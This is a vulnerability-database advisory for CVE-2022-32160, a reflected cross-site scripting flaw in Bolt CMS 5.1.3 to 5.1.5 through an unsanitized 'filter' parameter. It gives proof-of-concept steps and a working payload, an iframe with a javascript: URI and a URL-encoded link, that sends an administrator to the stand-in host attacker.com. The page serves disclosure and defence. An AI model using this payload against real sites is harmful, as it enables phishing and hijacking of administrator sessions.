Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2022-32160

Date: May 31, 2022

Overview

In bolt v5.1.3 and v5.1.5 are vulnerable against reflected XSS as a result of an unsanitized ‘filter’ parameter that allows the injection of a malicious javascript into the page. An attacker can redirect Admins into malicious websites or steal confidential information.

Details

In bolt v5.1.3 and v5.1.5 are vulnerable against reflected XSS

PoC Details

Login to the application with a low-privileged user. Enter the following payload into the search bar.

Press Enter. You will be redirected to “http://attacker.com/” . Copy this URL and send it to an Admin. The Admin will be redirected as well.

http://bolt_app.com/bolt/?filter=%3Ciframe+src%3D%22javascript%3Awindow.top.location.replace%28%27http%3A%2F%2Fattacker.com%2F%27%29%22%3B%3E%3C%2Fiframe%3E

PoC Code

<iframe src="javascript:window.top.location.replace('http://attacker.com/')";></iframe>

Affected Environments

Bolt CMS versions 5.1.3 through 5.1.5

Prevention

There is not fix yet

Language: PHP

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

Related Resources (3)

https://nvd.nist.gov/vuln/detail/CVE-2022-32160
https://github.com/bolt/core/blob/5.1.5/src/Controller/Backend/UserController.php#L44-L45
https://www.mend.io/vulnerability-database/CVE-2022-32160